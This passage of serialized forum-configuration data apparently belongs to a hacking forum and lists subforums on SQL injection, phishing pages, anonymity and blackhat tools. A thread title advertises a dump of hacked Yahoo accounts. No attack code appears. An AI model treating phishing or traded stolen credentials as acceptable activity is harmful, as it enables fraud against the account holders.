threads.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"1\";s:10:\"parentlist\";s:4:\"1,19\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:40:\"[Junk]HOW TO GET UNLIMITED SKYPE PREMIUM\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"trash_full.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:50;a:37:{s:3:\"fid\";s:2:\"50\";s:4:\"name\";s:17:\"Private Inquiries\";s:11:\"description\";s:103:\"Have a complaint against someone? Need to report a valid rep abuse? You can only view your own threads.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"3\";s:10:\"parentlist\";s:6:\"1,3,50\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:23:\"Report against a thread\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:713:\"This forum allows you to talk privately with staff about any issues you have relating to the forum:
The following topics for example should be posted here: Please do not post the following topics: \";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"flag_red.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:49;a:37:{s:3:\"fid\";s:2:\"49\";s:4:\"name\";s:21:\"Suggestions and Ideas\";s:11:\"description\";s:101:\"Have a new Idea? Want to help us improve L33T Hacking? Post all your suggestions and new ideas here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"3\";s:10:\"parentlist\";s:6:\"1,3,49\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"53\";s:15:\"lastpostsubject\";s:26:\"[Suggestion] Post cooldown\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:18:\"Light Bulb Off.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:2;a:37:{s:3:\"fid\";s:1:\"2\";s:4:\"name\";s:4:\"Test\";s:11:\"description\";s:32:\"For staff to test new features. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"5\";s:10:\"parentlist\";s:5:\"1,5,2\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"61\";s:15:\"lastpostsubject\";s:7:\"dkdadwa\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:20:\"1339992224_tests.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:7;a:37:{s:3:\"fid\";s:1:\"7\";s:4:\"name\";s:9:\"Off Topic\";s:11:\"description\";s:97:\"All discussions non-relating hacking are allowed in this section. Trolling will not be tolerated.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:3:\"6,7\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"334\";s:15:\"lastpostsubject\";s:16:\"Post your setup!\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"2\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:60:\"1. No trolling 2. No donation begging 3. This is not 4chan\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"1339992294_sofa.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:42;a:37:{s:3:\"fid\";s:2:\"42\";s:4:\"name\";s:18:\"News and Happening\";s:11:\"description\";s:49:\"Find out the latest buzz around the around here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:4:\"6,42\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"262\";s:15:\"lastpostsubject\";s:36:\"Marijuana legalized in two US states\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"news2.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:47;a:37:{s:3:\"fid\";s:2:\"47\";s:4:\"name\";s:29:\"Member Contests and Giveaways\";s:11:\"description\";s:125:\"All giveaways and member contests will be held here. There will not be any official contests so participate at your own risk!\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:4:\"6,47\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"346\";s:15:\"lastpostsubject\";s:14:\"eBook Givaway!\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:23:\"package_games_board.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:65;a:37:{s:3:\"fid\";s:2:\"65\";s:4:\"name\";s:5:\"Movie\";s:11:\"description\";s:83:\"Discuss about your favorite movies here. Get reviews about the latest movies here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:4:\"6,65\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"205\";s:15:\"lastpostsubject\";s:39:\"Who\'s watched The Social Network movie?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"film.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:9;a:37:{s:3:\"fid\";s:1:\"9\";s:4:\"name\";s:22:\"Monetizing Techniques \";s:11:\"description\";s:75:\"If you\'re looking for methods to make more money online this is your forum.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:3:\"6,9\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:48:\"? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:27:\"1339992422_emblem-money.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:8;a:37:{s:3:\"fid\";s:1:\"8\";s:4:\"name\";s:5:\"Music\";s:11:\"description\";s:57:\"Fan of Music? Discuss and post your favorite songs here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"6\";s:10:\"parentlist\";s:3:\"6,8\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"302\";s:15:\"lastpostsubject\";s:18:\"Who likes OFWGKTA?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:18:\"1339992375_juk.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:56;a:37:{s:3:\"fid\";s:2:\"56\";s:4:\"name\";s:12:\"Forum Games \";s:11:\"description\";s:35:\"All forum games will be held here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"7\";s:10:\"parentlist\";s:6:\"6,7,56\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:22:\"Ban the user above you\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:135:\"1. Threads with 100 or more posts will be closed. 2. No offsite games. 3. You can not post more than thrice a day in the same thread.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:26:\"package_games_emulator.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:83;a:37:{s:3:\"fid\";s:2:\"83\";s:4:\"name\";s:34:\"Miscellaneous Tutorials and Guides\";s:11:\"description\";s:86:\"All tutorials and guides that don\'t belong in any other section should be posted here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:1:\"7\";s:10:\"parentlist\";s:6:\"6,7,83\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:36:\"[How to] Send a DMCA takedown notice\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:253:\"1. No distributing of porn, pedophile or any similar sort of discussion. 2. No illegal tutorials such as murdering, stealing etc. 3. No program giveaways in this section. 4. No tutorials on weapons creation. 5. No blackhat activity discussions here.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"tutorial.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:11;a:37:{s:3:\"fid\";s:2:\"11\";s:4:\"name\";s:9:\"Help Desk\";s:11:\"description\";s:73:\"New to hacking? Need help? Post all your questions here. Read forum rules\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,11\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"53\";s:15:\"lastpostsubject\";s:21:\"What can you do with?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"2\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:136:\"1. This forum is for help only, not for tutorials. 2. Please be patient, you can not expect a reply as soon as you post your question.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:31:\"1339992459_Help_Circle_Blue.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:12;a:37:{s:3:\"fid\";s:2:\"12\";s:4:\"name\";s:9:\"Tutorials\";s:11:\"description\";s:96:\"This forum is for all hacking and setup tutorials and guides. Please share your tutorials here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,12\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"258\";s:15:\"lastpostsubject\";s:36:\"Big list Hacking tutorials with .txt\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:24:\"1339992570_graduated.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:13;a:37:{s:3:\"fid\";s:2:\"13\";s:4:\"name\";s:25:\"Website and Forum Hacking\";s:11:\"description\";s:122:\"SQL Injection is a common website and forum hacking technique used by many website hackers. Learn how to SQL Inject here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,13\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:35:\"400,000 Hacked Yahoo Accounts Dumps\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:34:\"1339992990_domain-names-px-png.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:14;a:37:{s:3:\"fid\";s:2:\"14\";s:4:\"name\";s:10:\"Anonymity \";s:11:\"description\";s:86:\"Discussions on staying Anonymous including Proxies and Virtual Private Networks (VPNs)\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,14\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:26:\"VPN Accounts With Guide :)\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"modem.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:46;a:37:{s:3:\"fid\";s:2:\"46\";s:4:\"name\";s:24:\"Phishing and Tabnabbing \";s:11:\"description\";s:70:\"A forum for discussions of phishing(Fake login pages) and tabnabbing. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,46\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"205\";s:15:\"lastpostsubject\";s:43:\"Did someone ever hack you through phishing?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:295:\"1. No phishing discussions on Online Banks, such as PayPal, Liberty reserve etc. 2. You are not allowed to post links to your phishing pages here.
3. We are not responsible for how you use this section, this section is for educational purposes.
\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"web_layout.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:15;a:37:{s:3:\"fid\";s:2:\"15\";s:4:\"name\";s:18:\"Tools and Programs\";s:11:\"description\";s:76:\"Share your favorite blackhat tools and programs here. Read the forum rules. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,15\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:14:\"WinRAR 